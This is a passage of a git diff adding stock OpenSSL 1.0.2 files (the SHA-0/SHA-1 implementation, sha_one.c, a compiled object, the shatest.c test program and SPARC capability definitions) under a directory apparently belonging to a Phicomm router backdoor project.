+#define F_20_39(b,c,d)  ((b) ^ (c) ^ (d))
+#define F_40_59(b,c,d)  (((b) & (c)) | (((b)|(c)) & (d)))
+#define F_60_79(b,c,d)  F_20_39(b,c,d)
+
+#ifndef OPENSSL_SMALL_FOOTPRINT
+
+# define BODY_00_15(i,a,b,c,d,e,f,xi) \
+        (f)=xi+(e)+K_00_19+ROTATE((a),5)+F_00_19((b),(c),(d)); \
+        (b)=ROTATE((b),30);
+
+# define BODY_16_19(i,a,b,c,d,e,f,xi,xa,xb,xc,xd) \
+        Xupdate(f,xi,xa,xb,xc,xd); \
+        (f)+=(e)+K_00_19+ROTATE((a),5)+F_00_19((b),(c),(d)); \
+        (b)=ROTATE((b),30);
+
+# define BODY_20_31(i,a,b,c,d,e,f,xi,xa,xb,xc,xd) \
+        Xupdate(f,xi,xa,xb,xc,xd); \
+        (f)+=(e)+K_20_39+ROTATE((a),5)+F_20_39((b),(c),(d)); \
+        (b)=ROTATE((b),30);
+
+# define BODY_32_39(i,a,b,c,d,e,f,xa,xb,xc,xd) \
+        Xupdate(f,xa,xa,xb,xc,xd); \
+        (f)+=(e)+K_20_39+ROTATE((a),5)+F_20_39((b),(c),(d)); \
+        (b)=ROTATE((b),30);
+
+# define BODY_40_59(i,a,b,c,d,e,f,xa,xb,xc,xd) \
+        Xupdate(f,xa,xa,xb,xc,xd); \
+        (f)+=(e)+K_40_59+ROTATE((a),5)+F_40_59((b),(c),(d)); \
+        (b)=ROTATE((b),30);
+
+# define BODY_60_79(i,a,b,c,d,e,f,xa,xb,xc,xd) \
+        Xupdate(f,xa,xa,xb,xc,xd); \
+        (f)=xa+(e)+K_60_79+ROTATE((a),5)+F_60_79((b),(c),(d)); \
+        (b)=ROTATE((b),30);
+
+# ifdef X
+#  undef X
+# endif
+# ifndef MD32_XARRAY
+  /*
+   * Originally X was an array. As it's automatic it's natural
+   * to expect RISC compiler to accomodate at least part of it in
+   * the register bank, isn't it? Unfortunately not all compilers
+   * "find" this expectation reasonable:-( On order to make such
+   * compilers generate better code I replace X[] with a bunch of
+   * X0, X1, etc. See the function body below...
+   *                                    <appro@fy.chalmers.se>
+   */
+#  define X(i)   XX##i
+# else
+  /*
+   * However! Some compilers (most notably HP C) get overwhelmed by
+   * that many local variables so that we have to have the way to
+   * fall down to the original behavior.
+   */
+#  define X(i)   XX[i]
+# endif
+
+# if !defined(SHA_1) || !defined(SHA1_ASM)
+static void HASH_BLOCK_DATA_ORDER(SHA_CTX *c, const void *p, size_t num)
+{
+    const unsigned char *data = p;
+    register unsigned MD32_REG_T A, B, C, D, E, T, l;
+#  ifndef MD32_XARRAY
+    unsigned MD32_REG_T XX0, XX1, XX2, XX3, XX4, XX5, XX6, XX7,
+        XX8, XX9, XX10, XX11, XX12, XX13, XX14, XX15;
+#  else
+    SHA_LONG XX[16];
+#  endif
+
+    A = c->h0;
+    B = c->h1;
+    C = c->h2;
+    D = c->h3;
+    E = c->h4;
+
+    for (;;) {
+        const union {
+            long one;
+            char little;
+        } is_endian = {
+            1
+        };
+
+        if (!is_endian.little && sizeof(SHA_LONG) == 4
+            && ((size_t)p % 4) == 0) {
+            const SHA_LONG *W = (const SHA_LONG *)data;
+
+            X(0) = W[0];
+            X(1) = W[1];
+            BODY_00_15(0, A, B, C, D, E, T, X(0));
+            X(2) = W[2];
+            BODY_00_15(1, T, A, B, C, D, E, X(1));
+            X(3) = W[3];
+            BODY_00_15(2, E, T, A, B, C, D, X(2));
+            X(4) = W[4];
+            BODY_00_15(3, D, E, T, A, B, C, X(3));
+            X(5) = W[5];
+            BODY_00_15(4, C, D, E, T, A, B, X(4));
+            X(6) = W[6];
+            BODY_00_15(5, B, C, D, E, T, A, X(5));
+            X(7) = W[7];
+            BODY_00_15(6, A, B, C, D, E, T, X(6));
+            X(8) = W[8];
+            BODY_00_15(7, T, A, B, C, D, E, X(7));
+            X(9) = W[9];
+            BODY_00_15(8, E, T, A, B, C, D, X(8));
+            X(10) = W[10];
+            BODY_00_15(9, D, E, T, A, B, C, X(9));
+            X(11) = W[11];
+            BODY_00_15(10, C, D, E, T, A, B, X(10));
+            X(12) = W[12];
+            BODY_00_15(11, B, C, D, E, T, A, X(11));
+            X(13) = W[13];
+            BODY_00_15(12, A, B, C, D, E, T, X(12));
+            X(14) = W[14];
+            BODY_00_15(13, T, A, B, C, D, E, X(13));
+            X(15) = W[15];
+            BODY_00_15(14, E, T, A, B, C, D, X(14));
+            BODY_00_15(15, D, E, T, A, B, C, X(15));
+
+            data += SHA_CBLOCK;
+        } else {
+            (void)HOST_c2l(data, l);
+            X(0) = l;
+            (void)HOST_c2l(data, l);
+            X(1) = l;
+            BODY_00_15(0, A, B, C, D, E, T, X(0));
+            (void)HOST_c2l(data, l);
+            X(2) = l;
+            BODY_00_15(1, T, A, B, C, D, E, X(1));
+            (void)HOST_c2l(data, l);
+            X(3) = l;
+            BODY_00_15(2, E, T, A, B, C, D, X(2));
+            (void)HOST_c2l(data, l);
+            X(4) = l;
+            BODY_00_15(3, D, E, T, A, B, C, X(3));
+            (void)HOST_c2l(data, l);
+            X(5) = l;
+            BODY_00_15(4, C, D, E, T, A, B, X(4));
+            (void)HOST_c2l(data, l);
+            X(6) = l;
+            BODY_00_15(5, B, C, D, E, T, A, X(5));
+            (void)HOST_c2l(data, l);
+            X(7) = l;
+            BODY_00_15(6, A, B, C, D, E, T, X(6));
+            (void)HOST_c2l(data, l);
+            X(8) = l;
+            BODY_00_15(7, T, A, B, C, D, E, X(7));
+            (void)HOST_c2l(data, l);
+            X(9) = l;
+            BODY_00_15(8, E, T, A, B, C, D, X(8));
+            (void)HOST_c2l(data, l);
+            X(10) = l;
+            BODY_00_15(9, D, E, T, A, B, C, X(9));
+            (void)HOST_c2l(data, l);
+            X(11) = l;
+            BODY_00_15(10, C, D, E, T, A, B, X(10));
+            (void)HOST_c2l(data, l);
+            X(12) = l;
+            BODY_00_15(11, B, C, D, E, T, A, X(11));
+            (void)HOST_c2l(data, l);
+            X(13) = l;
+            BODY_00_15(12, A, B, C, D, E, T, X(12));
+            (void)HOST_c2l(data, l);
+            X(14) = l;
+            BODY_00_15(13, T, A, B, C, D, E, X(13));
+            (void)HOST_c2l(data, l);
+            X(15) = l;
+            BODY_00_15(14, E, T, A, B, C, D, X(14));
+            BODY_00_15(15, D, E, T, A, B, C, X(15));
+        }
+
+        BODY_16_19(16, C, D, E, T, A, B, X(0), X(0), X(2), X(8), X(13));
+        BODY_16_19(17, B, C, D, E, T, A, X(1), X(1), X(3), X(9), X(14));
+        BODY_16_19(18, A, B, C, D, E, T, X(2), X(2), X(4), X(10), X(15));
+        BODY_16_19(19, T, A, B, C, D, E, X(3), X(3), X(5), X(11), X(0));
+
+        BODY_20_31(20, E, T, A, B, C, D, X(4), X(4), X(6), X(12), X(1));
+        BODY_20_31(21, D, E, T, A, B, C, X(5), X(5), X(7), X(13), X(2));
+        BODY_20_31(22, C, D, E, T, A, B, X(6), X(6), X(8), X(14), X(3));
+        BODY_20_31(23, B, C, D, E, T, A, X(7), X(7), X(9), X(15), X(4));
+        BODY_20_31(24, A, B, C, D, E, T, X(8), X(8), X(10), X(0), X(5));
+        BODY_20_31(25, T, A, B, C, D, E, X(9), X(9), X(11), X(1), X(6));
+        BODY_20_31(26, E, T, A, B, C, D, X(10), X(10), X(12), X(2), X(7));
+        BODY_20_31(27, D, E, T, A, B, C, X(11), X(11), X(13), X(3), X(8));
+        BODY_20_31(28, C, D, E, T, A, B, X(12), X(12), X(14), X(4), X(9));
+        BODY_20_31(29, B, C, D, E, T, A, X(13), X(13), X(15), X(5), X(10));
+        BODY_20_31(30, A, B, C, D, E, T, X(14), X(14), X(0), X(6), X(11));
+        BODY_20_31(31, T, A, B, C, D, E, X(15), X(15), X(1), X(7), X(12));
+
+        BODY_32_39(32, E, T, A, B, C, D, X(0), X(2), X(8), X(13));
+        BODY_32_39(33, D, E, T, A, B, C, X(1), X(3), X(9), X(14));
+        BODY_32_39(34, C, D, E, T, A, B, X(2), X(4), X(10), X(15));
+        BODY_32_39(35, B, C, D, E, T, A, X(3), X(5), X(11), X(0));
+        BODY_32_39(36, A, B, C, D, E, T, X(4), X(6), X(12), X(1));
+        BODY_32_39(37, T, A, B, C, D, E, X(5), X(7), X(13), X(2));
+        BODY_32_39(38, E, T, A, B, C, D, X(6), X(8), X(14), X(3));
+        BODY_32_39(39, D, E, T, A, B, C, X(7), X(9), X(15), X(4));
+
+        BODY_40_59(40, C, D, E, T, A, B, X(8), X(10), X(0), X(5));
+        BODY_40_59(41, B, C, D, E, T, A, X(9), X(11), X(1), X(6));
+        BODY_40_59(42, A, B, C, D, E, T, X(10), X(12), X(2), X(7));
+        BODY_40_59(43, T, A, B, C, D, E, X(11), X(13), X(3), X(8));
+        BODY_40_59(44, E, T, A, B, C, D, X(12), X(14), X(4), X(9));
+        BODY_40_59(45, D, E, T, A, B, C, X(13), X(15), X(5), X(10));
+        BODY_40_59(46, C, D, E, T, A, B, X(14), X(0), X(6), X(11));
+        BODY_40_59(47, B, C, D, E, T, A, X(15), X(1), X(7), X(12));
+        BODY_40_59(48, A, B, C, D, E, T, X(0), X(2), X(8), X(13));
+        BODY_40_59(49, T, A, B, C, D, E, X(1), X(3), X(9), X(14));
+        BODY_40_59(50, E, T, A, B, C, D, X(2), X(4), X(10), X(15));
+        BODY_40_59(51, D, E, T, A, B, C, X(3), X(5), X(11), X(0));
+        BODY_40_59(52, C, D, E, T, A, B, X(4), X(6), X(12), X(1));
+        BODY_40_59(53, B, C, D, E, T, A, X(5), X(7), X(13), X(2));
+        BODY_40_59(54, A, B, C, D, E, T, X(6), X(8), X(14), X(3));
+        BODY_40_59(55, T, A, B, C, D, E, X(7), X(9), X(15), X(4));
+        BODY_40_59(56, E, T, A, B, C, D, X(8), X(10), X(0), X(5));
+        BODY_40_59(57, D, E, T, A, B, C, X(9), X(11), X(1), X(6));
+        BODY_40_59(58, C, D, E, T, A, B, X(10), X(12), X(2), X(7));
+        BODY_40_59(59, B, C, D, E, T, A, X(11), X(13), X(3), X(8));
+
+        BODY_60_79(60, A, B, C, D, E, T, X(12), X(14), X(4), X(9));
+        BODY_60_79(61, T, A, B, C, D, E, X(13), X(15), X(5), X(10));
+        BODY_60_79(62, E, T, A, B, C, D, X(14), X(0), X(6), X(11));
+        BODY_60_79(63, D, E, T, A, B, C, X(15), X(1), X(7), X(12));
+        BODY_60_79(64, C, D, E, T, A, B, X(0), X(2), X(8), X(13));
+        BODY_60_79(65, B, C, D, E, T, A, X(1), X(3), X(9), X(14));
+        BODY_60_79(66, A, B, C, D, E, T, X(2), X(4), X(10), X(15));
+        BODY_60_79(67, T, A, B, C, D, E, X(3), X(5), X(11), X(0));
+        BODY_60_79(68, E, T, A, B, C, D, X(4), X(6), X(12), X(1));
+        BODY_60_79(69, D, E, T, A, B, C, X(5), X(7), X(13), X(2));
+        BODY_60_79(70, C, D, E, T, A, B, X(6), X(8), X(14), X(3));
+        BODY_60_79(71, B, C, D, E, T, A, X(7), X(9), X(15), X(4));
+        BODY_60_79(72, A, B, C, D, E, T, X(8), X(10), X(0), X(5));
+        BODY_60_79(73, T, A, B, C, D, E, X(9), X(11), X(1), X(6));
+        BODY_60_79(74, E, T, A, B, C, D, X(10), X(12), X(2), X(7));
+        BODY_60_79(75, D, E, T, A, B, C, X(11), X(13), X(3), X(8));
+        BODY_60_79(76, C, D, E, T, A, B, X(12), X(14), X(4), X(9));
+        BODY_60_79(77, B, C, D, E, T, A, X(13), X(15), X(5), X(10));
+        BODY_60_79(78, A, B, C, D, E, T, X(14), X(0), X(6), X(11));
+        BODY_60_79(79, T, A, B, C, D, E, X(15), X(1), X(7), X(12));
+
+        c->h0 = (c->h0 + E) & 0xffffffffL;
+        c->h1 = (c->h1 + T) & 0xffffffffL;
+        c->h2 = (c->h2 + A) & 0xffffffffL;
+        c->h3 = (c->h3 + B) & 0xffffffffL;
+        c->h4 = (c->h4 + C) & 0xffffffffL;
+
+        if (--num == 0)
+            break;
+
+        A = c->h0;
+        B = c->h1;
+        C = c->h2;
+        D = c->h3;
+        E = c->h4;
+
+    }
+}
+# endif
+
+#else                           /* OPENSSL_SMALL_FOOTPRINT */
+
+# define BODY_00_15(xi)           do {   \
+        T=E+K_00_19+F_00_19(B,C,D);     \
+        E=D, D=C, C=ROTATE(B,30), B=A;  \
+        A=ROTATE(A,5)+T+xi;         } while(0)
+
+# define BODY_16_19(xa,xb,xc,xd)  do {   \
+        Xupdate(T,xa,xa,xb,xc,xd);      \
+        T+=E+K_00_19+F_00_19(B,C,D);    \
+        E=D, D=C, C=ROTATE(B,30), B=A;  \
+        A=ROTATE(A,5)+T;            } while(0)
+
+# define BODY_20_39(xa,xb,xc,xd)  do {   \
+        Xupdate(T,xa,xa,xb,xc,xd);      \
+        T+=E+K_20_39+F_20_39(B,C,D);    \
+        E=D, D=C, C=ROTATE(B,30), B=A;  \
+        A=ROTATE(A,5)+T;            } while(0)
+
+# define BODY_40_59(xa,xb,xc,xd)  do {   \
+        Xupdate(T,xa,xa,xb,xc,xd);      \
+        T+=E+K_40_59+F_40_59(B,C,D);    \
+        E=D, D=C, C=ROTATE(B,30), B=A;  \
+        A=ROTATE(A,5)+T;            } while(0)
+
+# define BODY_60_79(xa,xb,xc,xd)  do {   \
+        Xupdate(T,xa,xa,xb,xc,xd);      \
+        T=E+K_60_79+F_60_79(B,C,D);     \
+        E=D, D=C, C=ROTATE(B,30), B=A;  \
+        A=ROTATE(A,5)+T+xa;         } while(0)
+
+# if !defined(SHA_1) || !defined(SHA1_ASM)
+static void HASH_BLOCK_DATA_ORDER(SHA_CTX *c, const void *p, size_t num)
+{
+    const unsigned char *data = p;
+    register unsigned MD32_REG_T A, B, C, D, E, T, l;
+    int i;
+    SHA_LONG X[16];
+
+    A = c->h0;
+    B = c->h1;
+    C = c->h2;
+    D = c->h3;
+    E = c->h4;
+
+    for (;;) {
+        for (i = 0; i < 16; i++) {
+            HOST_c2l(data, l);
+            X[i] = l;
+            BODY_00_15(X[i]);
+        }
+        for (i = 0; i < 4; i++) {
+            BODY_16_19(X[i], X[i + 2], X[i + 8], X[(i + 13) & 15]);
+        }
+        for (; i < 24; i++) {
+            BODY_20_39(X[i & 15], X[(i + 2) & 15], X[(i + 8) & 15],
+                       X[(i + 13) & 15]);
+        }
+        for (i = 0; i < 20; i++) {
+            BODY_40_59(X[(i + 8) & 15], X[(i + 10) & 15], X[i & 15],
+                       X[(i + 5) & 15]);
+        }
+        for (i = 4; i < 24; i++) {
+            BODY_60_79(X[(i + 8) & 15], X[(i + 10) & 15], X[i & 15],
+                       X[(i + 5) & 15]);
+        }
+
+        c->h0 = (c->h0 + A) & 0xffffffffL;
+        c->h1 = (c->h1 + B) & 0xffffffffL;
+        c->h2 = (c->h2 + C) & 0xffffffffL;
+        c->h3 = (c->h3 + D) & 0xffffffffL;
+        c->h4 = (c->h4 + E) & 0xffffffffL;
+
+        if (--num == 0)
+            break;
+
+        A = c->h0;
+        B = c->h1;
+        C = c->h2;
+        D = c->h3;
+        E = c->h4;
+
+    }
+}
+# endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha_one.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha_one.c
new file mode 100644
index 0000000..0930b98
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha_one.c
@@ -0,0 +1,79 @@
+/* crypto/sha/sha_one.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include <openssl/sha.h>
+#include <openssl/crypto.h>
+
+#ifndef OPENSSL_NO_SHA0
+unsigned char *SHA(const unsigned char *d, size_t n, unsigned char *md)
+{
+    SHA_CTX c;
+    static unsigned char m[SHA_DIGEST_LENGTH];
+
+    if (md == NULL)
+        md = m;
+    if (!SHA_Init(&c))
+        return NULL;
+    SHA_Update(&c, d, n);
+    SHA_Final(md, &c);
+    OPENSSL_cleanse(&c, sizeof(c));
+    return (md);
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha_one.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/sha_one.o
new file mode 100644
index 0000000000000000000000000000000000000000..71a30d08878c4f1e44a7788f4f21aa25a529a697
GIT binary patch
literal 2024
zcmbu9Uu)A)6u@tq&P}&vb&3ool7~$yy3no;b*MDm+NBaUv8#wUW7=iwSeuSEh0X^>
z#>6lud+@<WAN>?E&`%)y0DBM=l!*#Hh%(Pf?(MRWK6&79&iUPQ&b_&R@;I$#LL5h!
zaO65Uh!`d0P58i1I&PBmk{<H2@62!ccGmtS=d<=-c~;#V#?id8_O&^$Y=noS5GnTL
zP$|Bxtbefhti7XbmWR3&``c&CT;H~$s{KQ?_ZU&^J=Ol?48DEfRJ)m9_;mcEvH`8;
zm4w^a>TuGOwf9Zc-kp>0$#e4kci6TiQxg;8Vl-c9m{vo)A|<5QNc>X63FD7OV^Zwm
zITyPX_?Z#V4$!ITJP8r9jf@9HIq4e0J-kJ@W`rB;>FnBq4Z8~bG#z`1HX}q{gwn#m
zCZ86>=V3*NKJAzkUUQ*}5S<jnlrWGIA}OJZ*0eKt7Gd&zKWLl}JSki&TkYX09y<A@
z8vy6w?E5f}CrAA0PRx_eHaz%icxN{cm-Iu}?^(aIXTVN@;{N;P0)QYs)`lnB@EdLT
z-8P)mOS)Dy4XH>fQX(-rMskWwv?+BaC9B#@CX-9gYO``mO=~!!Wz8kaaq=tkx@9<S
zX35mcWaegiI+s(mV%gBmx<NFpZt2Bktyo&t7WAbuECA$$Yw+GVr}Agtm1~sa3HE?8
zKI7rN9**CGg82d{%U?tYg1iru@h1pDkmEixE`pDO>p^XaR9~%FdVxrFtLEAg^J+#}
zmn@@c5efD{CsLtaCsMImsTd|OvuYU<ysZ)E`)RyrHl&qWb;YPzt3+}-7$t3?rdN#C
zl>g(1P>gTMf1{JYP}u!*BR7}%Xa_-YZ<3&1*`iNvi^5}IaUS*(1}HyEx&LME&~d-P
z9$vxwk3IeMyEMuBZV~z4N*oyWjNzb1cBy~f!_Z~(Gdu2K-qdcE;DrIX`0ntpap(>~
z9HI3h_+DZA$5;UzO!e2tX#E|QNUgtq4tUV{i3ma1IpO(XEvsidXl|@~M(2M;E&fkg
l4;*LpN5S`>9gd3>E@R*k+O9>8gBMhPnXaGyK3e(y`hRPo*Czk~

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/shatest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/shatest.c
new file mode 100644
index 0000000..105060a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/shatest.c
@@ -0,0 +1,174 @@
+/* crypto/sha/shatest.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+
+#include "../e_os.h"
+
+#if defined(OPENSSL_NO_SHA) || defined(OPENSSL_NO_SHA0)
+int main(int argc, char *argv[])
+{
+    printf("No SHA0 support\n");
+    return (0);
+}
+#else
+# include <openssl/evp.h>
+# include <openssl/sha.h>
+
+# ifdef CHARSET_EBCDIC
+#  include <openssl/ebcdic.h>
+# endif
+
+# define SHA_0                  /* FIPS 180 */
+# undef  SHA_1                  /* FIPS 180-1 */
+
+static char *test[] = {
+    "abc",
+    "abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq",
+    NULL,
+};
+
+# ifdef SHA_0
+static char *ret[] = {
+    "0164b8a914cd2a5e74c4f7ff082c4d97f1edf880",
+    "d2516ee1acfa5baf33dfc1c471e438449ef134c8",
+};
+
+static char *bigret = "3232affa48628a26653b5aaa44541fd90d690603";
+# endif
+# ifdef SHA_1
+static char *ret[] = {
+    "a9993e364706816aba3e25717850c26c9cd0d89d",
+    "84983e441c3bd26ebaae4aa1f95129e5e54670f1",
+};
+
+static char *bigret = "34aa973cd4c4daa4f61eeb2bdbad27316534016f";
+# endif
+
+static char *pt(unsigned char *md);
+int main(int argc, char *argv[])
+{
+    int i, err = 0;
+    char **P, **R;
+    static unsigned char buf[1000];
+    char *p, *r;
+    EVP_MD_CTX c;
+    unsigned char md[SHA_DIGEST_LENGTH];
+
+# ifdef CHARSET_EBCDIC
+    ebcdic2ascii(test[0], test[0], strlen(test[0]));
+    ebcdic2ascii(test[1], test[1], strlen(test[1]));
+# endif
+
+    EVP_MD_CTX_init(&c);
+    P = test;
+    R = ret;
+    i = 1;
+    while (*P != NULL) {
+        EVP_Digest(*P, strlen(*P), md, NULL, EVP_sha(), NULL);
+        p = pt(md);
+        if (strcmp(p, *R) != 0) {
+            printf("error calculating SHA on '%s'\n", *P);
+            printf("got %s instead of %s\n", p, *R);
+            err++;
+        } else
+            printf("test %d ok\n", i);
+        i++;
+        R++;
+        P++;
+    }
+
+    memset(buf, 'a', 1000);
+# ifdef CHARSET_EBCDIC
+    ebcdic2ascii(buf, buf, 1000);
+# endif                         /* CHARSET_EBCDIC */
+    EVP_DigestInit_ex(&c, EVP_sha(), NULL);
+    for (i = 0; i < 1000; i++)
+        EVP_DigestUpdate(&c, buf, 1000);
+    EVP_DigestFinal_ex(&c, md, NULL);
+    p = pt(md);
+
+    r = bigret;
+    if (strcmp(p, r) != 0) {
+        printf("error calculating SHA on '%s'\n", p);
+        printf("got %s instead of %s\n", p, r);
+        err++;
+    } else
+        printf("test 3 ok\n");
+
+# ifdef OPENSSL_SYS_NETWARE
+    if (err)
+        printf("ERROR: %d\n", err);
+# endif
+    EVP_MD_CTX_cleanup(&c);
+    EXIT(err);
+    return (0);
+}
+
+static char *pt(unsigned char *md)
+{
+    int i;
+    static char buf[80];
+
+    for (i = 0; i < SHA_DIGEST_LENGTH; i++)
+        sprintf(&(buf[i * 2]), "%02x", md[i]);
+    return (buf);
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sparc_arch.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sparc_arch.h
new file mode 100644
index 0000000..e30d322
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sparc_arch.h
@@ -0,0 +1,101 @@
+#ifndef __SPARC_ARCH_H__
+# define __SPARC_ARCH_H__
+
+# define SPARCV9_TICK_PRIVILEGED (1<<0)
+# define SPARCV9_PREFER_FPU      (1<<1)
+# define SPARCV9_VIS1            (1<<2)
+# define SPARCV9_VIS2            (1<<3)/* reserved */
+# define SPARCV9_FMADD           (1<<4)/* reserved for SPARC64 V */
+# define SPARCV9_BLK             (1<<5)/* VIS1 block copy */
+# define SPARCV9_VIS3            (1<<6)
+# define SPARCV9_RANDOM          (1<<7)
+# define SPARCV9_64BIT_STACK     (1<<8)
+
+/*
+ * OPENSSL_sparcv9cap_P[1] is copy of Compatibility Feature Register,
+ * %asr26, SPARC-T4 and later. There is no SPARCV9_CFR bit in
+ * OPENSSL_sparcv9cap_P[0], as %cfr copy is sufficient...
+ */
+# define CFR_AES         0x00000001/* Supports AES opcodes */
+# define CFR_DES         0x00000002/* Supports DES opcodes */
+# define CFR_KASUMI      0x00000004/* Supports KASUMI opcodes */
+# define CFR_CAMELLIA    0x00000008/* Supports CAMELLIA opcodes */
+# define CFR_MD5         0x00000010/* Supports MD5 opcodes */
+# define CFR_SHA1        0x00000020/* Supports SHA1 opcodes */
+# define CFR_SHA256      0x00000040/* Supports SHA256 opcodes */
+# define CFR_SHA512      0x00000080/* Supports SHA512 opcodes */
+# define CFR_MPMUL       0x00000100/* Supports MPMUL opcodes */
+# define CFR_MONTMUL     0x00000200/* Supports MONTMUL opcodes */
+# define CFR_MONTSQR     0x00000400/* Supports MONTSQR opcodes */
+# define CFR_CRC32C      0x00000800/* Supports CRC32C opcodes */
+
+# if defined(OPENSSL_PIC) && !defined(__PIC__)
+#  define __PIC__
+# endif
+
